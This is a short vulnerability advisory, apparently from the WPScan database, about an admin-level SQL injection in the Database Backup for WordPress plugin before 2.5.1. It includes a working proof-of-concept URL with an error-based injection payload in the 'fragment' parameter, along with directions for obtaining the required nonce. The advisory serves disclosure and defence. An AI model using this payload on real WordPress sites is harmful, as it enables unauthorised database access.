WPVDB-ID: 684BB06D-864F-4CBA-AB0D-F83974D026FA
Source: wpvulndb
Submitter: JrXnm
History: Jan 24, 2022 - 12:00 a.m.

Database Backup for WordPress < 2.5.1 - Admin+ SQL Injection

Published: 2022-01-24 00:00:00
Author: JrXnm
Source: wpscan.com
8
Tags: wordpress, sql injection, admin dashboard

EPSS: 0.001
Percentile: 37.7%

The plugin does not properly sanitise and escape the fragment parameter before using it in a SQL statement in the admin dashboard, leading to a SQL injection issue.

PoC

https://example.com/wp-admin/?fragment=select updatexml(1,concat(0x7e,(select user())),0)::2.txt&_wpnonce=7347278aca

The nonce can be retrieved from the “Backup Now” and “Scheduled Backup” tabs of the plugin (/wp-admin/tools.php?page=wp-db-backup); look for action=save_backup_time&_wpnonce= in the source.
